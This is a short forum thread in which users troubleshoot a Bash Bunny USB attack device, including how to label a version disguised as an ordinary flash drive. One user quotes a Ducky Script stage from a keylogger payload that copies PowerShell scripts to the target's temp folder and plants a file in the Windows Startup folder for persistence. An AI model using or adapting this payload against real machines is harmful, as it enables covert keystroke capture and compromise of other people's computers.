lolcakes69 Posted November 26, 2022 Share Posted November 26, 2022 so this kinda feels like a dumb question, but which name do I use in payloads? The one that shows up when I plug it into my computer in arming mode without the SD card? Or the name that shows up when I plug it in in arming with the SD card? For easier reference, without the SD card, I have it named BashBunny. And with the SD card, I have it named "The Fat USB" with random media files so it's disguised. Link to comment Share on other sites More sharing options...
dark_pyrro Posted November 26, 2022 Share Posted November 26, 2022 Not exactly sure what you mean, but if you mean that you need a reference to the Bunny in PowerShell scripts that is used in payloads that is using ATTACKMODE STORAGE, then you need to use the label/name of the Bunny that the storage has that is mounted to the target. If using a Micro SD card, it's the label of the card. If not using any Micro SD card, it's the label of the Bunny internal storage. Link to comment Share on other sites More sharing options...
lolcakes69 Posted November 27, 2022 Author Share Posted November 27, 2022 I think that should answer my question. I'm messing around with PrettyBoyCosmo's BunnyKeyhook. The reference to the Bunny is actually in the duckyscript.txt instead of a PS script. Idk if this would be a better question for here or for Cosmo but I'm also wondering if there'd be an issue if there was an SD card in the Bunny. Because would it still see the payloads directory if it's referenced the way it is? REM STAGE 2 REM move files to appropiate directories REM change 'BashBunny' to the name of your bash bunny REM change 'switch1' to switch position that stores the paylaod STRING $u=gwmi Win32_Volume|?{$_.Label -eq'BashBunny'}|select name;cd $u.name;cp .\payloads\switch1\p.ps1 $env:temp;cp .\payloads\switch1\l.ps1 $env:temp;cp .\payloads\switch1\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log"; Link to comment Share on other sites More sharing options...
lolcakes69 Posted November 27, 2022 Author Share Posted November 27, 2022 a bit of clarification because reading that back, I can see it being confusing. Because with your answer I'd have to rename <'BashBunny'> to <The Fat USB>, but if I do this, would it still have access to the payloads folder? Since the payloads folder is under the BashBunny storage. Hopefully that clarifies my question. Link to comment Share on other sites More sharing options...
Anonee_Mouse Posted November 27, 2022 Share Posted November 27, 2022 when payloads are saved on the switch positions 1 or 2. they must be named payload.txt. so whenever you copy and paste your payload onto the switch, you have to rename all of them toe payload.txt. :) Link to comment Share on other sites More sharing options...
dark_pyrro Posted November 27, 2022 Share Posted November 27, 2022 1 hour ago, lolcakes69 said: would it still have access to the payloads folder Yes, the Bunny gets the payloads from the udisk (not the Micro SD card) with or without Micro SD card inserted. Link to comment Share on other sites More sharing options...
dark_pyrro Posted November 27, 2022 Share Posted November 27, 2022 1 hour ago, lolcakes69 said: The reference to the Bunny is actually in the duckyscript.txt instead of a PS script. It doesn't matter what script type it is, you have to refer to it using its label. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.